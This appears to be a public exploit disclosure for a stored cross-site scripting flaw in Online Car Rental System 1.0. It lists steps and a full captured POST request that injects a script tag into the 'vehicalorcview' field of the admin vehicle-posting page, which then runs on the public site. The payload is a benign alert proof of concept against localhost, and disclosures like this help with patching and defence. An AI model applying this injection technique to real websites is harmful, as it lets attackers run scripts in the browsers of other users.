Share
## https://sploitus.com/exploit?id=PACKETSTORM:161341
# Exploit Title: Online Car Rental System 1.0 - Stored Cross Site Scripting  
# Date: 9/2/2021  
# Exploit Author: Naved Shaikh  
# Vendor Homepage: https://www.sourcecodester.com/  
# Software Link: https://www.sourcecodester.com/cc/14145/online-car-rental-system-using-phpmysql.html  
# Version: V 1.0  
# Tested on Windows 10, XAMPP  
  
Steps:  
1) Open http://localhost/car-rental/admin/post-avehical.php   
  
2) Fill All the details on the page. After submitting, capture the request and change the "vehicalorcview" parameter with our Payload "<script>alert("CAR")</script>" and submit  
  
3) Open the http://localhost/car-rental/ and our Payload excuted.  
  
Request  
POST /car-rental/admin/post-avehical.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: multipart/form-data; boundary=---------------------------13786099262839578593645594965  
Content-Length: 2724377  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/car-rental/admin/post-avehical.php  
Cookie: PHPSESSID=h5ubatunno8u9130c4eq77anf2  
Upgrade-Insecure-Requests: 1  
  
-----------------------------13786099262839578593645594965  
Content-Disposition: form-data; name="vehicletitle"  
  
TestName  
-----------------------------13786099262839578593645594965  
Content-Disposition: form-data; name="brandname"  
  
2  
-----------------------------13786099262839578593645594965  
Content-Disposition: form-data; name="vehicalorcview"  
  
<script>alert("CAR")</script>  
-----------------------------13786099262839578593645594965  
Content-Disposition: form-data; name="priceperday"  
  
200  
-----------------------------13786099262839578593645594965  
Content-Disposition: form-data; name="fueltype"  
  
Diesel  
-----------------------------13786099262839578593645594965  
Content-Disposition: form-data; name="modelyear"  
  
2008  
-----------------------------13786099262839578593645594965  
Content-Disposition: form-data; name="seatingcapacity"  
  
22  
-----------------------------13786099262839578593645594965  
Content-Disposition: form-data; name="img1"; filename="Untitled.png"  
Content-Type: image/png  
  
ย‰PNG  
  
-----------------------------13786099262839578593645594965  
Content-Disposition: form-data; name="img5"; filename=""  
Content-Type: application/octet-stream  
  
  
-----------------------------13786099262839578593645594965  
Content-Disposition: form-data; name="powerdoorlocks"  
  
1  
-----------------------------13786099262839578593645594965  
Content-Disposition: form-data; name="antilockbrakingsys"  
  
1  
-----------------------------13786099262839578593645594965  
Content-Disposition: form-data; name="driverairbag"  
  
1  
-----------------------------13786099262839578593645594965  
Content-Disposition: form-data; name="passengerairbag"  
  
1  
-----------------------------13786099262839578593645594965  
Content-Disposition: form-data; name="centrallocking"  
  
1  
-----------------------------13786099262839578593645594965  
Content-Disposition: form-data; name="crashcensor"  
  
1  
-----------------------------13786099262839578593645594965  
Content-Disposition: form-data; name="submit"  
  
  
-----------------------------13786099262839578593645594965--